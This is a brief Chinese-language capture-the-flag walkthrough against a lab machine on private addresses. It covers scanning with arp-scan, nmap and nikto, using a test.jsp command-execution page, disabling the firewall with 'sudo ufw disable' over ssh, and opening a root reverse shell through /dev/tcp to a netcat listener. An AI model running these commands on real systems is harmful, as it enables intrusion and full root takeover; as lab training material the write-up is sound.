【CTF】命令执行实战
kali:192.168.223.131
target:192.168.223.173
通过arp-scan -l
获取目标IP为192.168.223.173,nmap扫描一下,只开放了8080端口,是个http服务,进去后没啥东西
nmap -p- -A 192.168.223.173
nikto扫描一下8080端口
nikto -h http://192.168.223.173:8080
扫出一个test.jsp,里面有命令执行,列出目录,慢慢探查
ls -lah /home //获取用户bill
ssh bill@localhost sudo ufw disable //关闭防火墙
通过nc开启监听
nc -lvnp 4444
将服务器的以root权限反弹到kali上,目标上线
//关闭防火墙
ssh bill@localhost sudo ufw disable
ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.223.131/4444 0>&1
我们可以在命令执行端口通过ssh免登陆的方式反弹shell给我们